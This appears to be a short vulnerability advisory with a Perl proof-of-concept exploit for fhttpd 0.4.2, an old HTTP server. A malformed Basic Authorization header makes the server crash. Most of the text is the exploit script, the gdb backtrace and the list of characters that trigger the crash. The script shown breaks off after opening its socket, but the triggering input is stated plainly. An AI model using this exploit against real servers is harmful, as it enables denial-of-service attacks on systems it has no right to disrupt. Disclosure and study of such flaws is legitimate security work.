fhttpd an HTTP daemon - "a program, which allows users from other machines on the Internet to access some information, stored on server machine in the form of text, pictures, sounds, hypertext documents, binary files and to run some programs on the server. To access that information users use some HTTP client, such as Netscape, Mosaic, Lynx, etc. If you are reading this on the fhttpd distribution site, you are using some HTTP client already". A vulnerability in fhttpd allows remote attackers to cause the product to crash by sending it a malformed Authorization request.
Exploit:
#!/usr/bin/perl
#Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
#http://www.fhttpd.org / fhttpd-0.4.2.tar.gz (WARNING: VERY OLD)
#Program received signal SIGSEGV, Segmentation fault.
#0x0804b42d in un64 (s=0x809b2d2 "") at util.cc:69
#69 if(c2!=-2) c3=rptr[3]; else c3=-2;
#(gdb) bt
#0 0x0804b42d in un64 (s=0x809b2d2 "") at util.cc:69
#1 0x080672bf in ControlFTPServerApp::process_get_line (this=0x8089678,
#fhttpd.cc:2044
#3 0x08060190 in Wheel::onepass (this=0x8081338) at sockobj.cc:1953
#4 0x08073c14 in main (argc=1, argv=0xbffff464, env=0xbffff46c) at fhttpd.cc:3645
#One of the near useless bugs found by my fuzzer with http fuzz capabilities
# Crashes with { } | [ ] \ ; : ' " < > ? , . OR with just a space after Basic:
use IO::Socket;
if(@ARGV < 1)
{
print "\nUsage: host\n\n";
exit(1);
}
$host = $ARGV[0];
$port = 80;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host, PeerPort=>$port)
or die "\nError: socket\n\n";
